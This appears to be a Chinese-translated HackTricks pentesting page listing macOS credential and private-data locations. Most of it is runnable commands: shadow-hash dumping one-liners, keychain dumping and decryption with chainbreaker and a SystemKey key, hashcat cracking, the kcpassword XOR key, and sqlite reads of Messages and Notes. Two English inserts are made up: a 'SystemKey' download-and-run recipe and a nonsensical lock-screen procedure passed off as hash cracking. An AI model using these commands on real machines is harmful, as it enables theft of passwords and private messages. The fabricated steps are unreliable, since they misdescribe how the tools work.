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# macOS敏感位置
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
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## 密码
### 影子密码
{% code overflow="wrap" %}
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
{% endcode %}
[**像这个脚本**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) 或者 [**这个脚本**](https://github.com/octomagon/davegrohl.git) 可以用来将哈希转换为 **hashcat** **格式**。
另一种方法是使用以下一行命令将所有非服务账户的凭证以 hashcat 格式 `-m 7100`(macOS PBKDF2-SHA512)进行转储:
{% code overflow="wrap" %}
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
{% endcode %}
### 密钥链转储
请注意,当使用 security 二进制文件来转储解密的密码时,会出现多个提示要求用户允许此操作。
secuirty dump-trust-settings [-s] [-d] #List certificates
security list-keychains #List keychain dbs
security list-smartcards #List smartcards
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)
### [Keychaindump](https://github.com/juuso/keychaindump)
{% hint style="danger" %}
根据这个评论 [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760),看起来这些工具在Big Sur上不再起作用。
{% endhint %}
sudo vmmap <securityd PID> | grep MALLOC_TINY
**Keychaindump** 然后会在返回的堆中搜索 0x0000000000000018 的出现次数。如果以下 8 字节的值指向当前堆,我们就找到了一个潜在的主密钥。从这里开始,还需要进行一些解混淆的工作,可以在源代码中看到,但作为分析师,最重要的是要注意解密这些信息所需的数据存储在 securityd 的进程内存中。以下是 keychain dump 输出的示例。
sudo ./keychaindump
### chainbreaker
* 经过哈希处理的钥匙串密码,适用于使用[hashcat](https://hashcat.net/hashcat/)或[John the Ripper](https://www.openwall.com/john/)进行破解
* 互联网密码
* 通用密码
* 私钥
* 公钥
* X509证书
* 安全笔记
* Appleshare密码
### **转储钥匙串密钥**
#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
### **使用SystemKey转储钥匙串密钥(包括密码)**
To dump keychain keys (with passwords) using SystemKey, follow these steps:
1. Open Terminal and run the following command to download SystemKey:
curl -O https://github.com/kennytm/SystemKey/raw/master/SystemKey
2. Make the downloaded file executable by running the following command:
chmod +x SystemKey
3. Run the SystemKey command with the `-d` flag to dump the keychain keys:
./SystemKey -d
This will display the keychain keys along with their associated passwords.
Note: Dumping keychain keys with passwords can be a sensitive operation, so ensure that you have the necessary permissions and authorization to perform this action.
# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
### **转储钥匙串密钥(包括密码)并破解哈希值**
To dump keychain keys (with passwords) and crack the hash, follow these steps:
1. Open the Keychain Access application on your macOS system.
2. Navigate to the "Keychain Access" menu and select "Preferences".
3. In the "Preferences" window, go to the "General" tab.
4. Check the box next to "Show keychain status in menu bar".
5. Close the "Preferences" window.
6. In the menu bar, you will now see a lock icon. Click on it and select "Lock Screen".
7. Enter your user password to lock the screen.
8. Press the power button to put your system to sleep.
9. Wake up your system by pressing any key or clicking the mouse.
10. Enter your user password to unlock the screen.
11. Open the Terminal application.
12. Type the following command and press Enter: `security dump-keychain -d login.keychain > keychain_dump.txt`
13. This command will dump the keychain keys (including passwords) into a file named "keychain_dump.txt".
14. Use a hash cracking tool, such as John the Ripper or Hashcat, to crack the hash values and retrieve the passwords.
1. 在您的 macOS 系统上打开“钥匙串访问”应用程序。
2. 导航到“钥匙串访问”菜单,选择“偏好设置”。
3. 在“偏好设置”窗口中,转到“常规”选项卡。
4. 勾选“在菜单栏中显示钥匙串状态”的复选框。
5. 关闭“偏好设置”窗口。
6. 在菜单栏中,您现在会看到一个锁形图标。单击它,选择“锁定屏幕”。
7. 输入您的用户密码以锁定屏幕。
8. 按下电源按钮将系统置于睡眠状态。
9. 通过按任意键或点击鼠标唤醒系统。
10. 输入您的用户密码以解锁屏幕。
11. 打开“终端”应用程序。
12. 输入以下命令并按回车键:`security dump-keychain -d login.keychain > keychain_dump.txt`
13. 此命令将钥匙串密钥(包括密码)转储到名为“keychain_dump.txt”的文件中。
14. 使用哈希破解工具,如John the Ripper或Hashcat,破解哈希值并检索密码。
# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
# Crack it with hashcat
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
### **使用内存转储来转储钥匙串密钥(包括密码)**
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
### **使用用户密码转储钥匙串密钥(包括密码)**
#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
### kcpassword
密码存储在文件**`/etc/kcpassword`**中,与密钥**`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`**进行异或运算。如果用户的密码比密钥长,密钥将被重复使用。\
## 数据库中的有趣信息
### Messages
sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
### 通知
您可以在 `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` 中找到通知数据。
大部分有趣的信息都会在 **blob** 中。因此,您需要 **提取** 该内容并将其转换为 **可读** 的格式,或者使用 **`strings`** 命令。要访问它,您可以执行以下操作:
{% code overflow="wrap" %}
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
### 注意事项
用户的**笔记**可以在`~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`中找到
{% code overflow="wrap" %}
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables
#To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
{% endcode %}
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
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